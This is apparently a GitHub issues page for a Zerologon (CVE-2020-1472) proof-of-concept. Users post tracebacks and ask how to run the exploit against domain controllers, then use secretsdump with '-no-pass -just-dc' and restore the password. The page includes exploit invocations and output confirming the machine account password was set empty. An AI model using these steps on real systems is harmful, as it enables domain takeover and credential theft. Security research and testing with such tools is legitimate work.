dirkjanm / cve-2020-1472
PoC for Zerologon - all research credits go to Tom Tervoort of Secura
The linked code is not working; the current releases don't contain the referred line.
Can you please post a working method to print the hex via secretsdump?
Thanks!
Target vulnerable, changing account password to empty string
Traceback (most recent call last):
File "./cve-2020-1472-exploit.py", line 106, in
perform_attack('\\' + dc_name, dc_ip, dc_name)
File "./cve-2020-1472-exploit.py", line 84, in perform_attack
result = exploit(dc_handle, rpc_con, target_computer)
File "./cve-2020-1472-exploit.py", line 57, in exploit
request = nrpc.NetrServerPasswordSet2()
AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'
I have installed the latest Impacket and also ran the Python script; I get the error below:
python cve-2020-1472-exploit.py ba.local 192.168.75.131
File "cve-2020-1472-exploit.py", line 16
print(msg, file=sys.stderr)
I can ping the DC:
root@kali:~/AD-cve/CVE-2020-1472# ping 192.168.75.131
PING 192.168.75.131 (192.168.75.131) 56(84) bytes of data.
64 bytes from 192.168.75.131: icmp_seq=1 ttl=128 time=0.584 ms
64 bytes from 192.168.75.131: icmp_seq=2 ttl=128 time=0.300 ms
Any idea? Thank you in advance.
I get the following error and I'm not sure why:
impacket.dcerpc.v5.nrpc.DCERPCSessionError: NRPC SessionError: code: 0xc000018b - STATUS_NO_TRUST_SAM_ACCOUNT - The SAM database on the Windows Server does not have a computer account for this workstation trust relationship.
The command I'm running:
python3.7 restorepassword.py <NetBIOS name> -target-ip <IP> -hexpass <hexpass>
My OS: Linux
DC OS: Windows Server 2016
Hi!
First of all - thanks!
I have tried playing with the syntax after successfully running the exploit script, but I'm unable to get any results from running secretsdump.py at the end.
Is it something like this?
secretsdump.py -no-pass -just-dc <TARGET IP>
The output looks like this:
Impacket v0.9.22.dev1+20200915.115225.78e8c8e4 - Copyright 2020 SecureAuth Corporation
[*] Cleaning up...
Best regards,
Balackie
Can you provide an example of how to use secretsdump.py to dump the plaintext machine password? I see that restorepassword.py needs the hexpass, but I cannot figure out how to get that.
Thanks
When running the restorepassword.py script I have this error: socket.gaierror: [Errno -2] Name or service not known
⋊> ~/T/CVE-2020-1472 on master ⨯ python3 cve-2020-1472-exploit.py WIN-NP8JD7IHCC5 192.168.0.104 10:12:29
Performing authentication attempts...
==========================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
⋊> ~/T/CVE-2020-1472 on master ⨯ python3 restorepassword.py poudlard.wizard/WIN-NP8JD7IHCC5@WIN-NP8JD7IHCC5 -hexpass xxxxxx
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation
Traceback (most recent call last):
File "restorepassword.py", line 150, in <module>
action.dump(remoteName, options.target_ip)
File "restorepassword.py", line 48, in dump
stringbinding = epm.hept_map(remoteName, nrpc.MSRPC_UUID_NRPC, protocol = 'ncacn_ip_tcp')
File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/epm.py", line 1256, in hept_map
dce.connect()
File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
return self._transport.connect()
File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/transport.py", line 342, in connect
af, socktype, proto, canonname, sa = socket.getaddrinfo(self.getRemoteHost(), self.get_dport(), 0, socket.SOCK_STREAM)[0]
File "/usr/lib/python3.8/socket.py", line 918, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
socket.gaierror: [Errno -2] Name or service not known
Client: Python 3.7, Windows 2008 R2; server: Windows 2012 DC. I encounter this error: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2', this might have been caused by invalid arguments or network error. How to resolve?